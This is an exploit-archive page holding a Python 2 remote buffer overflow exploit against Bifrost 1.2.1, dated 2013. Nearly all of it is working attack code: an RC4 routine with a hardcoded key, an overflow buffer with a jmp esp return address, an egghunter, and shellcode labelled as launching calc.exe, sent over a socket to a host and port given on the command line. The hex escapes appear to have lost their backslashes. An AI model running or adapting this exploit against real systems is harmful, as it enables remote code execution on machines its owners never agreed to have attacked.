[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Bifrost 1.2.1 - Remote Buffer OverFlow
# Published : 2013-06-30
# Author :
# Previous Title : Java Applet ProviderSkeleton Insecure Invoke Method
# Next Title : Bifrost 1.2d - Remote Buffer Overflow
#!/usr/bin/python2.7
#By : Mohamed Clay
import socket
from time import sleep
from itertools import izip, cycle
import base64
import sys
def rc4crypt(data, key):
x = 0
box = range(256)
for i in range(256):
x = (x + box[i] + ord(key[i % len(key)])) % 256
box[i], box[x] = box[x], box[i]
x = 0
y = 0
out = []
for char in data:
x = (x + 1) % 256
y = (y + box[x]) % 256
box[x], box[y] = box[y], box[x]
out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))
return ''.join(out)
def bif_len(s):
while len(s)<8:
s=s+"00"
return s
def header(s):
a=(s[0]+s[1]).decode("hex")
a+=(s[2]+s[3]).decode("hex")
a+=(s[4]+s[5]).decode("hex")
a+=(s[5]+s[6]).decode("hex")
return a
def random():
a=""
for i in range(0,8):
a+="A"*1000+"|"
return a
def usage():
print "nnt***************************"
print "t* By : Mohamed Clay *"
print "t* Bifrost 1.2.1 Exploit *"
print "t***************************n"
print "t Usage : ./bifrost1.2.1 host port"
print "tExample : ./bifrost1.2.1 192.168.1.10 81nn"
if len(sys.argv)!=3:
usage()
exit()
HOST=sys.argv[1]
PORT=int(sys.argv[2])
key="xA3x78x26x35x57x32x2Dx60xB4x3Cx2Ax5Ex33x34x72x00"
xor="xB2x9Cx51xBB" # we need this in order to bypass 0046A03E function
eip="x53x93x3Ax7E" # jmp esp User32.dll
egghunter = "x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8x77x30x30x74x8BxFAxAFx75xEAxAFx75xE7xFFxE7";
#calc.exe shellcode (badchars "x00")
buf ="xb8x75xd3x5cx87xd9xeexd9x74x24xf4x5bx31xc9"
buf +="xb1x33x31x43x12x83xebxfcx03x36xddxbex72x44"
buf +="x09xb7x7dxb4xcaxa8xf4x51xfbxfax63x12xaexca"
buf +="xe0x76x43xa0xa5x62xd0xc4x61x85x51x62x54xa8"
buf +="x62x42x58x66xa0xc4x24x74xf5x26x14xb7x08x26"
buf +="x51xa5xe3x7ax0axa2x56x6bx3fxf6x6ax8axefx7d"
buf +="xd2xf4x8ax41xa7x4ex94x91x18xc4xdex09x12x82"
buf +="xfex28xf7xd0xc3x63x7cx22xb7x72x54x7ax38x45"
buf +="x98xd1x07x6ax15x2bx4fx4cxc6x5exbbxafx7bx59"
buf +="x78xd2xa7xecx9dx74x23x56x46x85xe0x01x0dx89"
buf +="x4dx45x49x8dx50x8axe1xa9xd9x2dx26x38x99x09"
buf +="xe2x61x79x33xb3xcfx2cx4cxa3xb7x91xe8xafx55"
buf +="xc5x8bxedx33x18x19x88x7ax1ax21x93x2cx73x10"
buf +="x18xa3x04xadxcbx80xfbxe7x56xa0x93xa1x02xf1"
buf +="xf9x51xf9x35x04xd2x08xc5xf3xcax78xc0xb8x4c"
buf +="x90xb8xd1x38x96x6fxd1x68xf5xeex41xf0xd4x95"
buf +="xe1x93x28"
raw=(1000-533-len(egghunter))*"x90"
raw2=(1000-8-len(buf))*"x41"+"|"
command=30
tmp=hex(command).split("0x")[1]
data=tmp.decode("hex")+"F"*2+" "*511+xor+"C"*8+eip+"A"*12+egghunter+raw+"|"+" "*1000+"|"+"w00tw00t"+buf+raw2+random()
out=rc4crypt(data,key)
l=header(bif_len(str(hex(len(data))).split("0x")[1]))
out=l+out
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.sendall(out)
print "n[*] By : Mohamed Clay"
print "[*] Exploit completedn"